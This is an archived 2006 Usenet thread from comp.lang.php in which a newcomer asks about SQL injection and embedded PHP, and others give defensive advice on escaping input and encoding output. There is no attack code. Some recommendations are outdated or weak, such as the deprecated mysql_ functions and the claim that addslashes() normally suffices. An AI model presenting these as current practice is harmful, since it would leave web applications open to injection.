MySQL newbie, not new to computing.
In my application I accept photos and data, some structured and
some free text. I store the information (but not the images) in a
MySQL database and then from that information I construct a web
page for the user.
The images are always displayed within an <img tag.
The text is displayed as part of the web page, within <ptags.
The users are all registered and (more or less) trusted individuals
<paranoid mode on>
1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?
2: Do I need to worry about PHP statements being embedded in the
free form data ?
3: if so, what is the best practices to protect my database/site ?
<paranoid mode off>
--
bill 13  2258 
On Tue, 19 Dec 2006 06:37:22 -0500, in comp.lang.php bill
<no****@spamcop.net>
<HL******************************@cablespeedmi.com wrote:
>| MySQL newbie, not new to computing.
|
| In my application I accept photos and data, some structured and
| some free text. I store the information (but not the images) in a
| MySQL database and then from that information I construct a web
| page for the user.
|
| The images are always displayed within an <img tag.
|
| The text is displayed as part of the web page, within <ptags.
|
| The users are all registered and (more or less) trusted individuals
|
| <paranoid mode on>
|
| 1: Do I need to worry about SQL injection if I do not process the
| incoming free form data ?
|
| 2: Do I need to worry about PHP statements being embedded in the
| free form data ?
|
| 3: if so, what is the best practices to protect my database/site ?
|
| <paranoid mode off>
http://en.wikibooks.org/wiki/Program...:SQL_Injection http://www.php.net/manual/en/securit...-injection.php http://dev.mysql.com/tech-resources/...curity-ch3.pdf
--------------------------------------------------------------- jn******@yourpantsyahoo.com.au : Remove your pants to reply
---------------------------------------------------------------
In article <HL******************************@cablespeedmi.com >,
bill <no****@spamcop.netwrote:
MySQL newbie, not new to computing.
In my application I accept photos and data, some structured and
some free text. I store the information (but not the images) in a
MySQL database and then from that information I construct a web
page for the user.
The images are always displayed within an <img tag.
The text is displayed as part of the web page, within <ptags.
The users are all registered and (more or less) trusted individuals
<paranoid mode on>
1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?
Worry? Maybe not. Prevent? Yes.
2: Do I need to worry about PHP statements being embedded in the
free form data ?
No. PHP statements in form data wont' be executed.
But, if they upload an "image" that really is "malware.php" and you
save it to disk and it can be browsed to through DOCUMENT_ROOT, then
it will be executed and it could do all sorts of nasty stuff.
3: if so, what is the best practices to protect my database/site ?
Make it ugly so no one will use it :-D
--
Sandman[.net]
bill wrote:
MySQL newbie, not new to computing.
In my application I accept photos and data, some structured and
some free text. I store the information (but not the images) in a
MySQL database and then from that information I construct a web
page for the user.
The images are always displayed within an <img tag.
The text is displayed as part of the web page, within <ptags.
The users are all registered and (more or less) trusted individuals
<paranoid mode on>
1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?
Why do you let the visitor fill in data if you do not process it?
>
2: Do I need to worry about PHP statements being embedded in the
free form data ?
That depends 100% on what you do with the data.
A man walks into a shop and want to buy a knife.
He asks the guy behind the counter: "Do I have to worry this knife will be
used for something dangerous?"
>
3: if so, what is the best practices to protect my database/site ?
Understand how it works.
Understand how the underlying OS works.
Understand how the security is implemented.
Understand what users are and what rights are on both the OS and the
database.
>
<paranoid mode off>
The fact that you are paranoid, doesn't mean they are not after you.
It is good you ask yourself these questions, but don't expect us to answer
them in depth because security is a broad subject.
Regards,
Erwin Moller
bill wrote:
1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?
Yes. Never, but never, trust user input. Always validate it and make sure
it can do no harm before doing anything else with it.
2: Do I need to worry about PHP statements being embedded in the
free form data ?
Probably not.
3: if so, what is the best practices to protect my database/site ?
The MySQL module provides a function called mysql_real_escape_string() or
some silly name like that. (For other databases, addslashes() will
normally suffice.) Run any user input through that before inserting/
updating it into your database.
For output, pass everything through htmlentities() to make sure it is
"safe" to appear. For example, what happens if a photo description
consists of:
<big><strong><font color=red>Hello!!!
This isn't necessarily a malicious user -- just someone who wanted to type
a big, bold, red greeting to the world but forgot to close their tags.
Imagine what a malicious user could do (e.g. run javascript off your site).
--
Toby A Inkster BSc (Hons) ARCS
Contact Me ~ http://tobyinkster.co.uk/contact
3: if so, what is the best practices to protect my database/site ?
>
Two simple rules to prevent SQL injection (MySQL)
1. if the input data is string, escape the quote
e.g.
this is "dsds =this is \"dsds
2. if the input data is integer, make sure it is really integer and
never contains characters
e.g. i = intval(i); // force integer
howa wrote:
>>3: if so, what is the best practices to protect my database/site ?
Two simple rules to prevent SQL injection (MySQL)
1. if the input data is string, escape the quote
e.g.
this is "dsds =this is \"dsds
Which does not work with all character sets. Better is to use
mysql_real_escape_string().
2. if the input data is integer, make sure it is really integer and
never contains characters
e.g. i = intval(i); // force integer
--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp. js*******@attglobal.net
==================
bill schrieb:
1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?
2: Do I need to worry about PHP statements being embedded in the
free form data ?
3: if so, what is the best practices to protect my database/site ?
Post an email to me and I'll forward a small wrapper class, which
protects against this problem.
>
>3: if so, what is the best practices to protect my database/site ?
Make it ugly so no one will use it :-D
good idea, but I think I will not try for this - might get there
anyway.
bill
Erwin Moller wrote:
bill wrote:
>MySQL newbie, not new to computing.
In my application I accept photos and data, some structured and
some free text. I store the information (but not the images) in a
MySQL database and then from that information I construct a web
page for the user.
The images are always displayed within an <img tag.
The text is displayed as part of the web page, within <ptags.
The users are all registered and (more or less) trusted individuals
<paranoid mode on>
1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?
Why do you let the visitor fill in data if you do not process it?
I guess I should be more clear. I save the data in a mysql
database and then paste it into a generated web page. By process
I meant mysql_real_escape_string() (about which I did not know)
bill
bill wrote:
MySQL newbie, not new to computing.
In my application I accept photos and data, some structured and some
free text. I store the information (but not the images) in a MySQL
database and then from that information I construct a web page for the
user.
The images are always displayed within an <img tag.
The text is displayed as part of the web page, within <ptags.
The users are all registered and (more or less) trusted individuals
<paranoid mode on>
1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?
2: Do I need to worry about PHP statements being embedded in the free
form data ?
3: if so, what is the best practices to protect my database/site ?
<paranoid mode off>
thanks all for the suggestions.
As I never use user input to a query string, just data, and the
images are not accessible except inside of <img tags it would
seem that I am moderately safe.
bill
In article <nb******************************@cablespeedmi.com >, no****@spamcop.net (bill) wrote:
1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?
Why do you let the visitor fill in data if you do not process it?
I guess I should be more clear. I save the data in a mysql
database
In that case an injection attack might well be possible and must be
guarded against. The text passed to the database might include a string to
say "That's the end of the data to be stored, and now here's the command
to delete the database".
--
To reply email rafe, at the address cix co uk
Rafe Culpin wrote:
In article <nb******************************@cablespeedmi.com >,
no****@spamcop.net (bill) wrote:
>>>1: Do I need to worry about SQL injection if I do not process the
incoming free form data ?
Why do you let the visitor fill in data if you do not process it?
I guess I should be more clear. I save the data in a mysql
database
In that case an injection attack might well be possible and must be
guarded against. The text passed to the database might include a string to
say "That's the end of the data to be stored, and now here's the command
to delete the database".
Ok, thank you.
I will sanitize the data.
bill
In article <nb******************************@cablespeedmi.com >,
bill <no****@spamcop.netwrote:
3: if so, what is the best practices to protect my database/site ?
Make it ugly so no one will use it :-D
good idea, but I think I will not try for this - might get there
anyway.
bill
:)
--
Sandman[.net] This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics | |
by: Matt |
last post by:
I want to know how ASP prevents "Spoofing" to happen?? Someone told me in
ASP.NET, the server validation can prevent "Spoofing" to happen.
Please advise.
|
by: Bă§TăRĐ |
last post by:
I have been working on this particular project for a little over 2 weeks now. This product contains between 700-900 stored procedures to handle just about all you can imagine within the product. I...
|
by: VK |
last post by:
I wandering about the common proctice of some UA's producers to spoof
the UA string to pretend to be another browser (most often IE).
Shouldn't it be considered as a trademark violation of the...
|
by: stirrell |
last post by:
Hello,
One problem that I had been having is stopping email injections on
contact forms. I did some research, read up on it and felt like I had
created a working solution. I hadn't gotten any...
|
by: |
last post by:
There are assorted "SQL Injection vulnerability assessment tools" out there.
They scan your site and send your report. They also take your money.
We don't have the money so I was wondering if I...
| | |
by: Sudhakar |
last post by:
A) validating username in php
as part of a registration form a user fills there desired username and
this is stored in a mysql. there are certain conditions for the
username.
a) the username...
|
by: shank |
last post by:
I've been hit again using DW, parameterized queries and stored procedures.
I'm guessing I was not strict enough with character counts and allowing to
long of a string to pass.
Aside from that,...
|
by: Brian Bozarth |
last post by:
This is weird, I'm pretty familiar with SQL Injection - but we're getting
these weird injection that is writing in the default document or home page.
What it's doing is putting in script code at...
|
by: Mufasa |
last post by:
I have a website that somebody is trying to hack with SQL Injection. (He was
already successful but I have fixed the vulnerability) I have already fixed
the website so it's 'safe' from the...
|
by: marktang |
last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
|
by: Hystou |
last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
| | |
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers,...
|
by: Hystou |
last post by:
Overview:
Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing,...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and...
|
by: adsilva |
last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
|
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
| | |
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence...
| |
